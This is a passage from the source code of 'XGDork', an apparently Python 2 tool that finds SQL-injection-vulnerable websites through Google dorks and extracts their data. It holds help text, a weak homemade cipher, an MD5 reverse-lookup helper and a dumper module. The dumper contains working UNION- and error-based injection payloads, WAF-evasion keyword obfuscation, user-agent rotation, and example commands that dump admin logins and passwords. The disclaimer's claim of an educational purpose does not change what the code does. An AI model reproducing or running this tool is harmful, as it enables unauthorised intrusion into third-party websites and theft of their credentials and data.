number") 62 | print (" e,g: -p 10 \n") 63 | 64 | print (" -p or --page 'range(n1,n2)' or 'n1,n2' :add pages number with range") 65 | print (" e,g: -p range(2,6) ") 66 | print (" e,g: -p 2,6 \n") 67 | 68 | print (" -o or --outfile 'out_file' :save result") 69 | print (" e,g: -o urls_sqli.txt \n") 70 | 71 | print (" -b or --bypass '1' :active bypass mode") 72 | print (" e,g: -b 1 \n") 73 | 74 | print (" -m or --mores '1' :mores infos, IPeer") 75 | print (" e,g: -m 1 \n") 76 | 77 | print (" -f or --forcing 'param_i' :stress url test, detect simple WAF and force error") 78 | print (" e,g: -f id= \n") 79 | 80 | print (" -i or --inject 'param_i' :brutal option, detect simple WAF and dump infos - ERROR Based") 81 | print (" e,g: -i id= \n") 82 | 83 | print (" -t or --timeout n :add timeout for requests/SQLparser(Reading)") 84 | print (" e,g: -t 5 \n") 85 | 86 | print (" -ex or --Ex 'your_custom_key' :encrypt your result (simple, weak)") 87 | print (" e,g: -ex '123' \n") 88 | 89 | 90 | print colored(" [XGDump - Dumper Mod]", 'green') 91 | print (" USE : XGDork.py --xgdump 'your_url_target' 'param_inject' 'mode' 'table' 'field1,field2..etc' :try inject and dump infos \n") 92 | 93 | print (" --xgdump 'url' 'param_i' '1' :try dump database_name_version") 94 | print (" e,g: -xgdump 'www.testwebsite.com/data/item.php?id=1984' id= 1 \n") 95 | 96 | print (" --xgdump 'url' 'param_i' '2' :try dump_tables") 97 | print (" e,g: -xgdump 'www.testwebsite.com/data/item.php?id=1984' id= 2 \n") 98 | 99 | print (" --xgdump 'url' 'param_i' '3' 'table' :try dump columns") 100 | print (" e,g: -xgdump 'www.testwebsite.com/data/item.php?id=1984 id= 3 tbl_admin' \n") 101 | 102 | print (" --xgdump 'url' 'param_i' '4' 'table' 'fields' :try dump fields_data") 103 | print (" e,g: -xgdump 'www.testwebsite.com/data/item.php?id=1984' id= 4 tbl_admin admin_id,admin_login,admin_password \n") 104 | 105 | 106 | print colored(" [XGDtoolz - simple Tools]", 'green') 107 | print (" USE : XGDtoolz.py --TOOL --ARGS :simple tools integrate with XGDork \n") 108 | 109 | print (" -gd or --gendork :allow to generate a dork") 110 | print (" e,g: XGDtoolz -gd \n") 111 | 112 | print (" -xmd5 or --xmd5 'your_hash' :try to find a string equal to the given hash") 113 | print (" e,g: XGDtoolz.py -xmd5 '1b36ea1c9b7a1c3ad668b8bb5df7963f' \n") 114 | 115 | print (" -ex or --Ex -s or --string 'string' -fs or --filestring 'file' -k or --key 'your_key' :allow encrypt a string or file") 116 | print (" e,g: XGDtoolz.py -ex -s 'Hello World' -k 'abc'") 117 | print (" e,g: XGDtoolz.py -ex -fs myfile.txt -k 'abc' \n") 118 | 119 | print (" -dx or --Dx -s or --string 'string' -fs or --filestring 'file' -k or --key 'your_key' :allow decrypt (string or file) Ex") 120 | print (" e,g: XGDtoolz.py -dx -s '###=0SLO...YkD...2DMi...0SL@@@' -k 'abc'") 121 | print (" e,g: XGDtoolz.py -dx -fs myfile.txt -k 'abc' \n") 122 | 123 | print ('\n') 124 | exit() 125 | 126 | 127 | if (sys.argv[iargs] == '-xgdump' or sys.argv[iargs] == '--xgdump'): 128 | data_url = sys.argv[iargs+1] 129 | data_param = sys.argv[iargs+2] 130 | data_mod = sys.argv[iargs+3] 131 | if (int(data_mod) >= 3): 132 | data_table = sys.argv[iargs+4] 133 | if (int(data_mod) == 4): 134 | data_fields = sys.argv[iargs+5] 135 | dump_module = 1 136 | 137 | 138 | if (sys.argv[iargs] == '-d' or sys.argv[iargs] == "--dork" or sys.argv[iargs] == '-gd' or sys.argv[iargs] == "--gendork"): 139 | if (sys.argv[iargs] == '-gd' or sys.argv[iargs] == "--gendork"): 140 | data_dork = genDork(0) 141 | else: 142 | data_dork = sys.argv[iargs+1] 143 | if (sys.argv[iargs] == '-p' or sys.argv[iargs] == "--page"): 144 | data_page = sys.argv[iargs+1] 145 | if (sys.argv[iargs] == '-cd' or sys.argv[iargs] == "--cdomain"): 146 | data_cdom = sys.argv[iargs+1] 147 | if (sys.argv[iargs] == '-o' or sys.argv[iargs] == "--outfile"): 148 | data_file = sys.argv[iargs+1] 149 | if (sys.argv[iargs] == '-b' or sys.argv[iargs] == "--bypass"): 150 | data_bypass = int(sys.argv[iargs+1]) 151 | if (sys.argv[iargs] == '-f' or sys.argv[iargs] == "--forcing"): 152 | data_forcing = sys.argv[iargs+1] 153 | if (sys.argv[iargs] == '-t' or sys.argv[iargs] == "--timeout"): 154 | data_timeout = int(sys.argv[iargs+1]) 155 | if (sys.argv[iargs] == '-ex' or sys.argv[iargs] == "--Ex"): 156 | data_x = 1 157 | data_xkey = sys.argv[iargs+1] 158 | if (sys.argv[iargs] == "-i" or sys.argv[iargs] == "--inject"): 159 | data_inject = sys.argv[iargs+1] 160 | if (sys.argv[iargs] == '-m' or sys.argv[iargs] == "--mores"): 161 | data_mores = int(sys.argv[iargs+1]) 162 | iargs += 1 163 | 164 | 165 | if ((data_dork != '' and data_page > 0 and data_file != '') or dump_module == 1): 166 | 167 | print ("\n\n") 168 | print colored(" __ ______ ____ 42 _ ", 'blue') 169 | print colored(" \ \/ / ___| _ \ ___ _ __| | __ ", 'blue') 170 | print colored(" \ / | _| | | |/ _ \| '__| |/ / ", 'blue') 171 | print colored(" / \ |_| | |_| | (_) | | | < ", 'blue') 172 | print colored(" /_/\_\____|____/ \___/|_| |_|\_\ \n", 'blue') 173 | print colored(" --- ViraX Google Dork Scanner --- \n", 'cyan') 174 | 175 | print (" Original code by ViraX") 176 | print (" Version: final-1.0k2 FreeSoftware for Python 2.7") 177 | print (" Compatible Mobile - Android (NoRoot) - Termux \n") 178 | 179 | print colored(" Contributor(s)/Source(s)", 'cyan') 180 | print (" - SQLmap ('agents file') - https://github.com/sqlmapproject/ ") 181 | print (" - ") 182 | print ("\n") 183 | 184 | print colored(" [!] DISCLAIMER: A simple 'naive' tool to find SQLi Vulnerable websites in the wild via Google.", 'green') 185 | print colored(" I am not responsible for illegal acts that you would do with this program !, only educational . [!] \n", 'green') 186 | 187 | 188 | print colored("\n [!] XGDork Start ["+str(time.ctime())+"] ... [!] \n", 'blue') 189 | 190 | 191 | if (dump_module == 1): 192 | fields_list = data_fields.split(',') 193 | print colored(" [*] Warning: XGDump is only based on the simple attack(s) for MySQL >= 5 (Generic)... it's a naive module ...\n", 'red') 194 | 195 | print colored(" [*] URL: "+data_url, 'cyan') 196 | print colored(" [*] Param: "+data_param, 'cyan') 197 | if (int(data_mod) < 3): 198 | print colored(" [*] Mode: "+str(data_mod)+"\n", 'cyan') 199 | elif (int(data_mod) == 3): 200 | print colored(" [*] Mode: "+str(data_mod)+" Table: "+data_table+"\n", 'cyan') 201 | elif (int(data_mod) == 4): 202 | print colored(" [*] Mode: "+str(data_mod)+" Table: "+data_table+" Fields: "+str(fields_list).replace(']', '').replace('[', '')+"\n", 'cyan') 203 | 204 | MOCA(data_url, data_param, int(data_mod), data_table, fields_list) 205 | print colored("\n [!] ["+str(time.ctime())+"] ... XGDork End [!] \n", 'blue') 206 | exit(0) 207 | else: 208 | 209 | data_file = str(data_file).replace('\n', '').replace(' ', '') 210 | nfile = open(data_file, 'w') 211 | nfile.write("--- XGDork Result [ "+data_dork+" ] --- \n") 212 | nfile.close() 213 | 214 | if (data_bypass > 0): 215 | print colored(" [*] Warning: Bypass mode is active, it may not work...", 'red') 216 | 217 | print colored(" [*] let's try with [ "+data_dork+" ] Happy hunting ! ;) ", 'cyan') 218 | search_engine (data_dork, data_page, data_file, data_bypass, data_cdom, data_forcing, data_timeout, data_inject, data_mores) 219 | if (data_x == 1): 220 | Ex ("", data_file, data_xkey, 256) 221 | 222 | print colored("\n [!] ["+str(time.ctime())+"] ... XGDork End [!] \n", 'blue') 223 | exit(1) 224 | 225 | else: 226 | print ("! USE : XGDork.py -h [OR] --help !") 227 | exit() 228 | -------------------------------------------------------------------------------- /XGDtoolz.py: -------------------------------------------------------------------------------- 1 | 2 | 3 | # This program is a 'total' free software: you can redistribute it and/or modify - ViraX 4 | # You can quoted me as a source. 5 | 6 | # svpEx/Ex svpDx/Dx is a simple symetric encryption system Blaise Vigenere based improve in 256 with key. 7 | 8 | import os, sys, base64 9 | from random import randint 10 | from XGDlib import block_cutter 11 | import requests 12 | import termios, tty, time, select 13 | 14 | def svpEx (string, keyuser, modulo): 15 | 16 | size_s = len(string)-1 17 | size_k = len(keyuser) 18 | i = 0 19 | k = 0 20 | 21 | ndata = "" 22 | tmp_list = [] 23 | 24 | while (i <= size_s and k <= size_k and string[i] != ""): 25 | 26 | tmp_list.append(((ord(string[i]) + ord(keyuser[k])) % int(modulo))) 27 | 28 | if (tmp_list[i] > modulo): 29 | tmp_list[i] -= modulo 30 | elif (tmp_list[i] < 32): 31 | tmp_list[i] += 32 32 | 33 | tmp_list[i] = chr(tmp_list[i]) 34 | k += 1 35 | i += 1 36 | 37 | if (k == size_k): 38 | k = 0 39 | 40 | ndata = "".join(tmp_list) 41 | return ndata 42 | 43 | 44 | 45 | 46 | def svpDx (string, keyuser, modulo): 47 | 48 | size_s = len(string)-1 49 | size_k = len(keyuser) 50 | i = 0 51 | k = 0 52 | 53 | ndata = "" 54 | tmp_list = [] 55 | 56 | while (i <= size_s and k <= size_k and string[i] != ""): 57 | 58 | tmp_list.append(((ord(string[i]) - ord(keyuser[k])) % int(modulo))) 59 | 60 | if (tmp_list[i] > modulo): 61 | tmp_list[i] -= modulo 62 | elif (tmp_list[i] < 32): 63 | tmp_list[i] += 32 64 | 65 | tmp_list[i] = chr(tmp_list[i]) 66 | k += 1 67 | i += 1 68 | 69 | if (k == size_k): 70 | k = 0 71 | 72 | ndata = "".join(tmp_list) 73 | return ndata 74 | 75 | 76 | 77 | 78 | def Ex (string, fstring, keyuser, modulo): 79 | 80 | nfile = file 81 | tmp_list = [] 82 | if (string == "" and fstring != ""): 83 | nfile = open(fstring, 'r') 84 | tmp_list = nfile.readlines() 85 | string = "".join(tmp_list) 86 | nfile.close() 87 | 88 | string = string[::-1] 89 | string = svpEx (string, keyuser, modulo) 90 | string = base64.b64encode(string) 91 | string = str(string.encode('hex')) 92 | string = svpEx (string, keyuser, modulo) 93 | 94 | string = str(string.encode('hex')) 95 | string = str("**-*"+str(string)+"*-**") 96 | string = string.replace('0', 'G').replace('1', 'A').replace('2', 'R').replace('3','K').replace('4', 'Y').replace('5', 'W').replace('6', 'S').replace('7', 'N').replace('8', 'Z').replace('9', 'V').replace('a', ':').replace('b', ';').replace('c', '?').replace('d', ',').replace('e', '!').replace('f', '.') 97 | string = svpEx (string, str("1984+_-_/:*ViraX("+keyuser+")2018+-_-;*vIRAx+"), modulo) 98 | string = str(string.encode('hex')) 99 | string = str("---@"+str(string)+"@---") 100 | string = str(base64.b64encode(string)) 101 | string = string.replace("==", '') 102 | string = string[::-1] 103 | string = str("###"+str(string)+"@@@") 104 | 105 | if (fstring != ""): 106 | nfile = open(fstring, 'w') 107 | nfile.write(string) 108 | nfile.close 109 | 110 | return string 111 | 112 | 113 | 114 | def Dx (string, fstring, keyuser, modulo): 115 | 116 | i = 0 117 | nfile = file 118 | tmp_list = [] 119 | if (string == "" and fstring != ""): 120 | nfile = open(fstring, 'r') 121 | tmp_list = nfile.readlines() 122 | string = "".join(tmp_list) 123 | nfile.close() 124 | 125 | string = string.replace("###", '').replace("@@@", '') 126 | string = string[::-1] 127 | string = str(str(string)+"==") 128 | string = str(base64.b64decode(string)) 129 | string = str(string.replace("---@", '').replace("@---", '')) 130 | string = str(string.decode('hex')) 131 | string = svpDx (string, str("1984+_-_/:*ViraX("+keyuser+")2018+-_-;*vIRAx+"), modulo) 132 | string = string.replace('G', '0').replace('A', '1').replace('R', '2').replace('K','3').replace('Y', '4').replace('W', '5').replace('S', '6').replace('N', '7').replace('Z', '8').replace('V', '9').replace(':', 'a').replace(';', 'b').replace('?', 'c').replace(',', 'd').replace('!','e').replace('.', 'f') 133 | string = str(string.replace("**-*", '').replace("*-**", '')) 134 | string = str(string.decode('hex')) 135 | 136 | string = svpDx (string, keyuser, modulo) 137 | string = str(string.decode('hex')) 138 | string = base64.b64decode(string) 139 | string = svpDx (string, keyuser, modulo) 140 | string = string[::-1] 141 | 142 | if (fstring != ""): 143 | 144 | tmp_list = list(string) 145 | while (i < len(tmp_list)-1): 146 | if (tmp_list[i] == "*" and tmp_list[i+1] == "h"): 147 | tmp_list[i] = '\n' 148 | i += 1 149 | tmp_list[i] = '' 150 | string = "".join(tmp_list) 151 | 152 | nfile = open(fstring, 'w') 153 | nfile.write(string) 154 | nfile.close() 155 | 156 | return string 157 | 158 | 159 | def genDork (out): 160 | 161 | d_npage = "" 162 | d_ext = "" 163 | d_param = "" 164 | d_data = "" 165 | d_keyword = "" 166 | size = 0 167 | 168 | nfile = file 169 | nfile = open("gd_namespage.txt", 'r') 170 | size = len(nfile.readlines())-1 171 | nfile.close 172 | nfile = open("gd_namespage.txt",'r') 173 | d_npage = str(nfile.readlines()[randint(0,size)].replace('\n','')) 174 | nfile.close() 175 | 176 | nfile = file 177 | nfile = open("gd_ext.txt", 'r') 178 | size = len(nfile.readlines())-1 179 | nfile.close() 180 | nfile = open("gd_ext.txt", 'r') 181 | d_ext = str(nfile.readlines()[randint(0,size)].replace('\n', '')) 182 | nfile.close() 183 | 184 | nfile = file 185 | nfile = open("gd_params.txt",'r') 186 | size = len(nfile.readlines())-1 187 | nfile.close() 188 | nfile = open("gd_params.txt", 'r') 189 | d_param = str(nfile.readlines()[randint(0,size)].replace('\n', '')) 190 | nfile.close() 191 | 192 | nfile = file 193 | nfile = open("gd_data.txt", 'r') 194 | size = len(nfile.readlines())-1 195 | nfile.close() 196 | nfile = open("gd_data.txt", 'r') 197 | d_data = str(nfile.readlines()[randint(0,size)].replace('\n', '')) 198 | nfile.close() 199 | 200 | nfile = file 201 | nfile = open("gd_keywords.txt", 'r') 202 | size = len(nfile.readlines())-1 203 | nfile.close() 204 | nfile = open("gd_keywords.txt", 'r') 205 | d_keyword = str(nfile.readlines()[randint(0,size)].replace('\n', '')) 206 | nfile.close() 207 | 208 | gdork = str("inurl:"+d_npage+d_ext+d_param+" "+d_keyword) 209 | 210 | if (out == 1): 211 | print gdork 212 | 213 | return gdork 214 | 215 | 216 | 217 | 218 | def s5o (hashstring): 219 | 220 | ca = 0 221 | cb = 0 222 | i = 0 223 | 224 | nurl = "http://www.nitrxgen.net/md5db/"+str(hashstring) 225 | r = requests.get(nurl) 226 | hash_value = r.text.encode('utf-8') 227 | if (hash_value == ''): 228 | nurl = "https://www.google.com/search?q="+str(hashstring)+" plain:" 229 | r = requests.get(nurl) 230 | data = r.text.encode('utf-8') 231 | nurl = "https://www.google.com/search?q=list intext:Hash:"+str(hashstring)+" & intext:Plain:" 232 | r = requests.get(nurl) 233 | data += r.text.encode('utf-8') 234 | while (i < len(data)-1): 235 | if (data[i] == 'H'): 236 | ca = i 237 | while (i < len(data)-1 and data[i] != ':'): 238 | i += 1 239 | cb = i 240 | tmp = block_cutter(data, ca, cb) 241 | if (tmp == 'Hash:'): 242 | while (i < len(data)-1 and data[i] != 'A'): 243 | i += 1 244 | cb = i 245 | found = block_cutter(data, ca, cb) 246 | hash_view = block_cutter(found, found.find('')+3, found.find('')-1) 247 | if (hash_view == hashstring): 248 | hash_value = block_cutter(found, found.find('Plain:')+14, found.find('. A')-1) 249 | if (hash_value != ''): 250 | return hash_value 251 | 252 | i += 1 253 | else: 254 | return hash_value 255 | 256 | return hash_value 257 | 258 | 259 | 260 | 261 | i = 1 262 | argc = len(sys.argv) 263 | if (argc >= 2): 264 | data_tool = str(sys.argv[1]) 265 | data_result = "" 266 | data_string = "" 267 | data_fs = "" 268 | data_key = "" 269 | data_modulo = 256 270 | 271 | 272 | if (data_tool == "--Ex" or data_tool == "-Ex" or data_tool == "-ex"): 273 | while (i < argc): 274 | if (sys.argv[i] == "-s" or sys.argv[i] == "--string"): 275 | data_string = sys.argv[i+1] 276 | if (sys.argv[i] == "--filestring" or sys.argv[i] == "-fs"): 277 | data_fs = sys.argv[i+1] 278 | if (sys.argv[i] == "-k" or sys.argv[i] == "--key"): 279 | data_key = sys.argv[i+1] 280 | i += 1 281 | data_result = Ex (data_string, data_fs, data_key, data_modulo) 282 | print (">> "+data_result) 283 | 284 | elif (data_tool == "--Dx" or data_tool == "-Dx" or data_tool == "-dx"): 285 | while (i < argc): 286 | if (sys.argv[i] == "-s" or sys.argv[i] == "--string"): 287 | data_string = sys.argv[i+1] 288 | if (sys.argv[i] == "-k" or sys.argv[i] == "--key"): 289 | data_key = sys.argv[i+1] 290 | if (sys.argv[i] == "--filestring" or sys.argv[i] == "-fs"): 291 | data_fs= sys.argv[i+1] 292 | i += 1 293 | data_result = Dx (data_string, data_fs, data_key, data_modulo) 294 | print (">> "+data_result) 295 | 296 | elif (data_tool =="--gendork" or data_tool == "-GD" or data_tool == "-gd"): 297 | data_result = genDork (0) 298 | print (">> "+data_result) 299 | 300 | elif (data_tool == "--xmd5" or data_tool == "-XMD5" or data_tool == "-xmd5"): 301 | data_result = s5o (sys.argv[2]) 302 | print (">> "+data_result) 303 | 304 | 305 | 306 | 307 | -------------------------------------------------------------------------------- /XGDumper.py: -------------------------------------------------------------------------------- 1 | 2 | 3 | # This program is a 'total' free software: you can redistribute it and/or modify - ViraX 4 | # You can quoted me as a source. 5 | 6 | 7 | import requests 8 | from termcolor import colored 9 | from XGDlib import block_cutter, ipuser, rand_agent 10 | 11 | 12 | 13 | def focpa (url, param): 14 | burl = "" 15 | i = 0 16 | ca = 0 17 | cb = 0 18 | tmp = "" 19 | 20 | while (i < len(url)): 21 | if (url[i] == '?' or url[i] == '&'): 22 | i += 1 23 | ca = i 24 | while (i < len(url) and url[i] != param[len(param)-1]): 25 | i += 1 26 | cb = i 27 | tmp = block_cutter(url, ca, cb) 28 | if (tmp == param): 29 | burl = block_cutter(url, 0, cb) 30 | 31 | return burl 32 | else: 33 | i = ca+1 34 | i += 1 35 | 36 | return -1 37 | 38 | 39 | 40 | def turing_range (nc_c, id_c, data): 41 | ndata = "" 42 | i = 1 43 | while (i <= nc_c): 44 | if (i == nc_c): 45 | if (data != '' and i == id_c): 46 | ndata += str(data) 47 | else: 48 | ndata += str(i) 49 | else: 50 | if (data != '' and i== id_c): 51 | ndata += str(data)+"," 52 | else: 53 | ndata += str(i)+"," 54 | i += 1 55 | 56 | return ndata 57 | 58 | 59 | 60 | def turing_fields (fields): 61 | ndata = "" 62 | i = 0 63 | while (i < len(fields)): 64 | if (i == len(fields)-1): 65 | ndata += "0x7c,"+fields[i] 66 | else: 67 | ndata += "0x7c,"+fields[i]+",0x7c,0x3e," 68 | i += 1 69 | 70 | return ndata 71 | 72 | 73 | 74 | def turing_heur (size): 75 | ndata = "" 76 | i = 0 77 | 78 | while (i <= size): 79 | if (i == size): 80 | ndata += "CHAR(088,071,068,079,082,075,013,010)" 81 | else: 82 | ndata += "CHAR(088,071,068,079,082,075,013,010)," 83 | i += 1 84 | 85 | return ndata 86 | 87 | 88 | def sbws (string): 89 | 90 | string = string.replace(" ", "+") 91 | string = string.replace("UNION", "/*!50000UnIoN*/") 92 | string = string.replace("ORDER", "/*!50000OrDeR*/") 93 | string = string.replace("GROUP_CONCAT", "/*!50000GrOuP_CoNcAt*/") 94 | string = string.replace("CONCAT", "/*!50000CoNcAt*/") 95 | string = string.replace("CHAR", "/*!50000ChAr*/") 96 | string = string.replace("FROM", "/*!50000FrOm*/") 97 | string = string.replace("WHERE", "/*!50000WhErE*/") 98 | string = string.replace("RAND", "/*!50000RaNd*/") 99 | string = string.replace("FLOOR", "/*!50000FlOoR*/") 100 | string = string.replace("HEX", "/*!50000HeX*/") 101 | string = string.replace("UNHEX", "/*!50000UnHeX*/") 102 | string = string.replace("LIMIT", "/*!50000LiMiT*/") 103 | string = string.replace("ELT", "/*!50000ElT*/") 104 | string = string.replace("SLEEP", "/*!50000SlEeP*/") 105 | string = string.replace("SELECT", "/*!50000SeLeCt*/") 106 | string = string.replace("COUNT", "/*!50000CoUnT*/") 107 | string = string.replace("@@version", "/*!50000@@VeRsIoN*/") 108 | string = string.replace("version()", "/*!50000VeRsIoN()*/") 109 | string = string.replace("database()", "/*!50000DaTaBaSe()*/") 110 | string = string.replace("TABLE_NAME", "/*!50000TaBlE_NaMe*/") 111 | string = string.replace("COLUMN_NAME", "/*!50000CoLuMn_NaMe*/") 112 | string = string.replace("INFORMATION_SCHEMA.TABLES", "/*!50000InFoRmAtIoN_ScHeMa.TaBlEs*/") 113 | string = string.replace("INFORMATION_SCHEMA.COLUMNS", "/*!50000InFoRmAtIoN_ScHeMa.CoLuMnS*/") 114 | string = string.replace("INFORMATION_SCHEMA.PLUGINS", "/*!50000InFoRmAtIoN_ScHeMa.PlUgInS*/") 115 | string = string.replace("TABLE_SCHEMA", "/*!50000TaBlE_ScHeMa*/") 116 | string = string.replace("GROUP", "/*!50000GrOuP*") 117 | string = string.replace("LIKE", "/*!50000LiKe*/") 118 | string = string.replace("BY", "/*!50000By*/") 119 | string = string.replace("CONCAT_WS", "/*!50000CoNcAt_Ws*/") 120 | string = string.replace("HAVING", "/*!50000HaViNg*/") 121 | string = string.replace("MIN", "/*!50000MiN*/") 122 | string = string.replace("CAST", "/*!50000CaSt*/") 123 | string = string.replace("AS", "/*!50000As*/") 124 | string = string.replace("CHAR", "/*!50000ChAr*/") 125 | string = string.replace("AND", "/*!50000AnD*/") 126 | string = string.replace("OR", "/*!50000Or*/") 127 | 128 | return string 129 | 130 | 131 | def stress_url (url, param): 132 | burl = "" 133 | nurl = "" 134 | data = "" 135 | waf = 0 136 | result = [] 137 | burl = focpa(url, param) 138 | 139 | user_agent = rand_agent() 140 | headers = {'User-Agent': user_agent} 141 | print colored(" [+] User-Agent: "+user_agent, 'green') 142 | print colored(" [*] Stress URL ... ", 'green') 143 | nurl = burl 144 | nurl += "1984 AND CONCAT(CHAR(088,071,068,079,082,075,013,010))" 145 | #print (nurl) 146 | 147 | r = requests.get(nurl, headers=headers) 148 | data = r.text.encode('utf-8') 149 | 150 | if (data.find("Mod_Security") > -1 or data.find("You don't have permission ") > -1): 151 | print colored(" [!] WAF Detected ! ", 'red') 152 | waf = 1 153 | 154 | 155 | nurl = burl 156 | nurl += "-300 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,database(),156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300 --" 157 | if (waf == 1): 158 | nurl = sbws(nurl) 159 | 160 | #print (nurl) 161 | r = requests.get(nurl, headers=headers) 162 | data = r.text.encode('utf-8') 163 | 164 | if (data.find('The used SELECT statements ') > -1): 165 | print colored(" [!] ERROR-BASED FOUND !", 'green') 166 | if (waf == 1): 167 | result.append(1) 168 | else: 169 | result.append(0) 170 | 171 | result.append(2) 172 | return result 173 | 174 | else: 175 | nurl = burl 176 | nurl += "777 ORDER BY 777 --" 177 | if (waf == 1): 178 | nurl = sbws(nurl) 179 | 180 | #print (nurl) 181 | r = requests.get(nurl, headers=headers) 182 | data = r.text.encode('utf-8') 183 | 184 | if (data.find("Unknown column '") > -1 and data.find("' in 'order clause'") > -1 or data.find('mysql_num_rows():') > -1 or data.find('mysql_num_row():') > -1): 185 | print colored(" [!] UNION-BASED FOUND !", 'green') 186 | if (waf == 1): 187 | result.append(1) 188 | else: 189 | result.append(0) 190 | 191 | result.append(1) 192 | return result 193 | 194 | else: 195 | print colored(" [*] TEST HEURISTIC-UNION ...", 'green') 196 | if (waf == 1): 197 | result.append(1) 198 | else: 199 | result.append(0) 200 | 201 | result.append(3) 202 | return result 203 | 204 | 205 | 206 | 207 | def heuristic_nc (url, param, waf): 208 | burl = "" 209 | nurl = "" 210 | i = 0 211 | ids_inject = [] 212 | rangestr = "" 213 | data = "" 214 | 215 | user_agent = rand_agent() 216 | headers = {'User-Agent': user_agent} 217 | print colored(" [+] User-Agent: "+user_agent, 'green') 218 | 219 | burl = focpa(url, param) 220 | 221 | print colored(" [*] COUNT, can take a while, wait ...", 'cyan') 222 | while (i <= 55): 223 | nurl = burl 224 | rangestr = turing_heur(i) 225 | 226 | nurl += "-1984 UNION SELECT "+rangestr+" --" 227 | if (waf == 1): 228 | nurl = sbws(nurl) 229 | 230 | #print (nurl) 231 | if (i == 1): 232 | print colored("- 1 to 10 ", 'cyan') 233 | if (i == 11): 234 | print colored("- 10 to 20 ", 'cyan') 235 | if (i == 21): 236 | print colored("- 20 to 30 ", 'cyan') 237 | if (i == 31): 238 | print colored("- 30 to 40 ", 'cyan') 239 | if (i == 41): 240 | print colored("- 40 to 55 ", 'cyan') 241 | 242 | r = requests.get(nurl, headers=headers) 243 | data = r.text.encode('utf-8') 244 | 245 | if (data.find('XGDORK') > -1): 246 | print colored(" [!] URL appears as injectable ...", 'green') 247 | return i+1 248 | 249 | i += 1 250 | 251 | print colored(" [!] Heuristic nc failed ", 'red') 252 | print colored(" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')", 'red') 253 | exit(0) 254 | 255 | 256 | 257 | def count_nc (url, param, waf): 258 | burl = "" 259 | nurl = "" 260 | i = 1 261 | 262 | user_agent = rand_agent() 263 | headers = {'User-Agent': user_agent} 264 | print colored(" [+] User-Agent: "+user_agent, 'green') 265 | 266 | burl = focpa(url, param) 267 | 268 | print colored(" [*] COUNT, Can take a while, wait ...", 'cyan') 269 | while (i <= 55): 270 | nurl = burl 271 | nurl += str(i)+" ORDER BY "+str(i)+" --" 272 | if (waf == 1): 273 | nurl = sbws(nurl) 274 | 275 | #print (nurl) 276 | if (i == 1): 277 | print colored("- 1 to 10 ", 'cyan') 278 | if (i == 11): 279 | print colored("- 10 to 20 ", 'cyan') 280 | if (i == 21): 281 | print colored("- 20 to 30 ", 'cyan') 282 | if (i == 31): 283 | print colored("- 30 to 40 ", 'cyan') 284 | if (i == 41): 285 | print colored("- 40 to 55 ", 'cyan') 286 | 287 | r = requests.get(nurl, headers=headers) 288 | data = r.text.encode('utf-8') 289 | 290 | if (data.find("Unknown column '") > -1 and data.find("' in 'order clause'") > -1 or data.find('mysql_num_rows():') > -1 or data.find('mysql_num_row():') > -1): 291 | #print ("DEBUG ERROR FOUND: "+str(i)) 292 | print colored(" [+] URL appears as injectable ...", 'green') 293 | return (i-1) 294 | 295 | i += 1 296 | 297 | print colored(" [!] Count nc failed ", 'red') 298 | print colored(" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')", 'red') 299 | exit(0) 300 | 301 | 302 | 303 | def id_checker (url, param, waf, nc): 304 | burl = "" 305 | nurl = "" 306 | data = "" 307 | rangestr = "" 308 | i = 0 309 | 310 | user_agent = rand_agent() 311 | headers = {'User-Agent': user_agent} 312 | print colored(" [+] User-Agent: "+user_agent, 'green') 313 | 314 | burl = focpa(url, param) 315 | 316 | while (i <= nc): 317 | nurl = burl 318 | rangestr = turing_range(nc, i, "CHAR(088,071,068,079,082,075,013,010)") 319 | nurl += "-1984 UNION SELECT "+rangestr+" --" 320 | if (waf == 1): 321 | nurl = sbws(nurl) 322 | 323 | #print (nurl) 324 | r = requests.get(nurl, headers=headers) 325 | data = r.text.encode('utf-8') 326 | 327 | if (data.find('XGDORK') > -1): 328 | #print ("ID Injectable: "+str(i)) 329 | return i 330 | 331 | i += 1 332 | 333 | print colored(" [!] Id checker failed ", 'red') 334 | print colored(" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')", 'red') 335 | exit(0) 336 | 337 | 338 | 339 | def parserDump (data, mod): 340 | i = 0 341 | ca = 0 342 | cb = 0 343 | data_list = [] 344 | 345 | while (i < len(data)-1): 346 | if (data[i] == '(' and data[i+1] == '^' and data[i+2] == '#'): 347 | i += 5 348 | ca = i 349 | while (i < len(data)-2 and (data[i] != '(' and data[i+2] != '#')): 350 | if (i == data.find("' for key")): 351 | break 352 | if (data[i] == '<'): 353 | break 354 | i += 1 355 | i -= 1 356 | cb = i 357 | tmp = block_cutter(data, ca, cb) 358 | data_list.append(tmp) 359 | 360 | print colored(" "+tmp, 'yellow') 361 | if (mod == 1): 362 | return data_list 363 | i += 1 364 | 365 | return data_list 366 | 367 | 368 | 369 | def parserDump_b (data, limiter): 370 | i = 0 371 | ca = 0 372 | cb = 0 373 | tmp = "" 374 | data_list = [] 375 | 376 | while (i < len(data)-1): 377 | if (data.find("Duplicate entry") > -1): 378 | i = data.find("Duplicate entry") 379 | ca = i 380 | while (i < len(data)-1 and data[i] != "'"): 381 | i += 1 382 | cb = i 383 | tmp = block_cutter(data, ca, cb) 384 | if (tmp == "Duplicate entry '" or tmp == "duplicate entry '" or tmp == ">Duplicate entry '" or tmp == 